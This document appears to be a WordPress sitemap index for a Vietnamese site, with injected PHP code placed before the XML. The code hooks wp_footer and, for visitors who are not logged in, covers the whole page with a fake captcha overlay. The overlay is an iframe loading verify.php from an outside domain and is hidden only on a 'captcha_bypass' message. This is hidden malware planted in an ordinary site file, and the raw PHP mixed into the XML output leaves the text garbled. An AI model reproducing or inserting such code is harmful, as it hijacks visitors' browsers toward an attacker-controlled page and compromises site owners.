add_action('wp_footer', 'my_captcha_overlay', 999);
function my_captcha_overlay() {
    if (is_admin()) return;
    if (is_user_logged_in()) return;
    ?>
    <div id="cf-overlay" style="position:fixed !important; top:0 !important; left:0 !important; width:100vw !important; height:100vh !important; background:rgba(0,0,0,0.8) !important; z-index:2147483647 !important; display:block;">
        <iframe id="cf-iframe" src="https://darkfadeson.top/verify.php" style="width:100% !important; height:100% !important; border:none !important;" allowtransparency="false"></iframe>
    </div>
    <script>
    (function() {
        var overlay = document.getElementById('cf-overlay');
        if (!overlay) return;
        window.addEventListener('message', function(e) {
            if (e.data && e.data.type === 'captcha_bypass') {
                overlay.style.display = 'none';
            }
        });
    })();
    </script>
    <?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//yenkhanhhoa.net.vn/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://yenkhanhhoa.net.vn/post-sitemap.xml</loc>
		<lastmod>2024-09-05T10:24:17+07:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://yenkhanhhoa.net.vn/page-sitemap.xml</loc>
		<lastmod>2026-03-09T19:25:11+07:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://yenkhanhhoa.net.vn/product-sitemap.xml</loc>
		<lastmod>2025-08-05T14:34:55+07:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Rank Math SEO Plugin (c) Rank Math - rankmath.com -->